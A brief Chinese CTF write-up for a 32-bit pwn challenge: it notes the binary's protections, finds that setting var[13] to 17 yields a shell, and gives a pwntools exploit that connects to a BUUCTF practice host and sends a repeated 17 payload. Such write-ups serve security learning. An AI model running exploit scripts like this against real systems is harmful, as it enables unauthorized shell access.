查看文件信息
checksec 一下,保护还开的挺满 canary(栈保护),nx(堆栈不可执行),PIE(地址随机化)

IDA 分析
其实我们应该nc 连一下的查看远程程序运行情况

丢入 32位IDA分析一下

很显然 程序的意思就是让 var[13] == 17就能拿到shell了
exp
from pwn import *
r = remote('node3.buuoj.cn',27168)
payload = p32(17) * 14
r.sendline(payload)
r.interactive()